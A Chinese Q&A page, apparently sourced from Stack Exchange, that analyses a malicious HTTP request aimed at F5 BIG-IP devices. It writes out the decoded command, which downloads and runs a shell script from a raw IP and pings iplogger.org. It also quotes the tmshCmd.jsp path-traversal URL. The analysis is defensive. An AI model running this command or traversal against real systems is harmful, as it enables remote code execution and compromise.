该HTTP请求中wget https://https:\iplogger.org"FGVP5命令的作用是什么?
分析HTTP请求中
wget https://https:\iplogger.org"FGVP5命令的作用 首先还原HTTP请求里command参数的完整命令(经过两次URL解码后):
wget http://136.144.41.3/Bigipdmcdmsklcmk/ohsitsvegawellrip.sh ; chmod 777 ohsitsvegawellrip.sh ; sh ohsitsvegawellrip.sh ; wget https://https:\iplogger.org"FGVP5
这是针对F5 BIG-IP设备的恶意攻击请求,通过路径绕过(/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp)直接执行系统命令。其中最后一段wget https://https:\iplogger.org"FGVP5的作用如下:
核心意图:验证入侵状态并收集目标IP信息
iplogger.org是用于记录请求来源IP的服务,攻击者原本的目的是让被入侵主机向该服务的特定标识(FGVP5为短链标识)发起请求,以此确认:- 之前的恶意脚本
ohsitsvegawellrip.sh已成功执行,主机处于可联网状态 - 获取目标主机的出口IP地址,为后续进一步攻击提供基础信息
- 之前的恶意脚本
URL畸形的原因
该命令中的URL格式错误(多了https:\和多余双引号),大概率是攻击者构造请求时多次URL编码操作失误导致的,原本的正确链接应该类似https://iplogger.org/FGVP5。
内容的提问来源于stack exchange,提问作者Jack Paul
相关产品推荐
相关产品推荐

